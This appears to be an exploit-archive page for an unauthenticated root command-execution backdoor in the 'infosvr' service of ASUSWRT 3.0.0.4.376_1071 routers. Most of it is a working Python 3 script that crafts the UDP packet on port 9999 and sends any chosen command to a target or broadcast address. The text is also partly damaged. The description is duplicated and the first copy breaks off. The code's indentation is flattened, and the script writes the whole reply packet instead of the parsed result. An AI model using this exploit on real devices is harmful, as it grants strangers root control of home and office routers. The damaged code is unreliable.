ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution

[Fi8sVrs]

Description

# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is

#!/usr/bin/env python3

# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution

# Date: 2014-10-11

# Vendor Homepage: http://www.asus.com/

# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip

# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip

# Tested Version: 3.0.0.4.376_1071-g8696125

# Tested Device: RT-N66U

# Description:

# A service called "infosvr" listens on port 9999 on the LAN bridge.

# Normally this service is used for device discovery using the

# "ASUS Wireless Router Device Discovery Utility", but this service contains a

# feature that allows an unauthenticated user on the LAN to execute commands

# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.

# "iboxcom.h" is in asuswrt/release/src/router/shared.

#

# Affected devices may also include wireless repeaters and other networking

# products, especially the ones which have "Device Discovery" in their features

# list.

#

# Using broadcast address as the IP address should work and execute the command

# on all devices in the network segment, but only receiving one response is

# supported by this script.

import sys, os, socket, struct

PORT = 9999

if len(sys.argv) < 3:

print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)

sys.exit(1)

ip = sys.argv[1]

cmd = sys.argv[2]

enccmd = cmd.encode()

if len(enccmd) > 237:

# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.

print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)

sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

sock.bind(('0.0.0.0', PORT))

sock.settimeout(2)

# Request consists of following things

# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

# PacketType [byte] ; NET_PACKET_TYPE_CMD

# OpCode [word] ; NET_CMD_ID_MANU_CMD

# Info [dword] ; Comment: "Or Transaction ID"

# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp

# Password [byte[32]] ; Not checked at all

# Length [word]

# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')

sock.sendto(packet, (ip, PORT))

# Response consists of following things

# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO

# PacketType [byte] ; NET_PACKET_TYPE_RES

# OpCode [word] ; NET_CMD_ID_MANU_CMD

# Info [dword] ; Equal to Info of request

# MacAddress [byte[6]] ; Filled in for us

# Length [word]

# Result [byte[420]] ; Actually returns that amount

while True:

data, addr = sock.recvfrom(512)

if len(data) == 512 and data[1] == 22:

break

length = struct.unpack('<H', data[14:16])[0]

s = slice(16, 16+length)

sys.stdout.buffer.write(data)

sock.close()

# milw00rm.com [2015-01-04]

Source